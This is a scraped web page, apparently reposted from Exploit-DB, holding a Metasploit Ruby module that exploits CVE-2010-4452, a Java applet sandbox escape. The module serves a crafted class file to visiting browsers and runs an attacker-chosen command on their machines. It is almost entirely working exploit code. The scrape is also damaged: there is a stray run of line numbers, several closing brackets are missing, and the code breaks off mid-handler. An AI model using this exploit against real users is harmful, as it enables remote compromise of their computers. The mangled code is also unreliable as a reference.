Sun Java Applet2ClassLoader – Remote Code Execution (Metasploit)

Exploit Database
147 阅读

作者： Metasploit

日期： 2011-03-16
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/16990/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

# $Id: java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

require 'rex'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize( info = {} )

super( update_info( info,

'Name'=> 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',

'Description' => %q{

This module exploits a vulnerability in Java Runtime Environment

that allows an attacker to escape the Java Sandbox. By supplying a

codebase that points at a trusted directory and a code that is a URL that

does not contain an dots an applet can run without the sandbox.

The vulnerability affects version 6 prior to update 24.

'License' => MSF_LICENSE,

'Author'=> [

'Frederic Hoguin', # Discovery, PoC

'jduck'# Metasploit module

'Version' => '$Revision: 11983 $',

'References'=>

[

[ 'CVE', '2010-4452' ],

# [ 'OSVDB', '' ],

[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],

[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],

[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]

'Platform'=> [ 'java', 'win' ],

'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

'Targets' =>

[

# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23

# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23

[ 'Automatic (no payload)', { } ]

=begin

[ 'Windows x86',

{

'Arch' => ARCH_X86,

'Platform' => 'win',

}

[ 'Generic (Java Payload)',

{

'Arch' => ARCH_JAVA,

'Platform' => 'java',

}

=end

'DefaultTarget'=> 0,

'DisclosureDate' => 'Feb 15 2011'

))

register_options(

[

OptString.new('CMD', [ false,"Command to run.", "calc.exe"]),

OptString.new('LIBPATH', [ false,"The codebase path to use (privileged)",

"C:\\Program Files\\java\\jre6\\lib\\ext"]),

], self.class)

end

def exploit

path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)

@java_class = nil

File.open(path, "rb") { |fd|

@java_class = fd.read(fd.stat.size)

}

if not @java_class

raise RuntimeError, "Unable to load java class"

end

super

end

def on_request_uri(cli, request)

#print_status("Received request: #{request.uri}")

jpath = get_uri(cli)

#print_status(jpath)

# Do what get_uri does so that we can replace it in the string

host = Rex::Socket.source_address(cli.peerhost)

host_num = Rex::Socket.addr_aton(host).unpack('N').first

codebase = "file:" + datastore['LIBPATH']

code_url = jpath.sub(host, host_num.to_s)

cmd = datastore['CMD']

cmd_off = 0xb4

cn_off = 0xfc

case request.uri

when /\.class$/

#p = regenerate_payload(cli)

print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")

cls = @java_class.dup

cls[cmd_off,2] = [cmd.length].pack('n')

cls[cmd_off+2,8] = cmd

cn_off += (cmd.length - 8)# the original length was 8 (calc.exe)

cls[cn_off,2] = [code_url.length].pack('n')

cls[cn_off+2,7] = code_url

#File.open('ughz.class', 'wb') { |fd| fd.write cls }

send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })

handler(cli)

else

html = <<-EOS

<html>

<body>

</body>

</html>

EOS

print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")

send_response_html(cli, html)

handler(cli)

end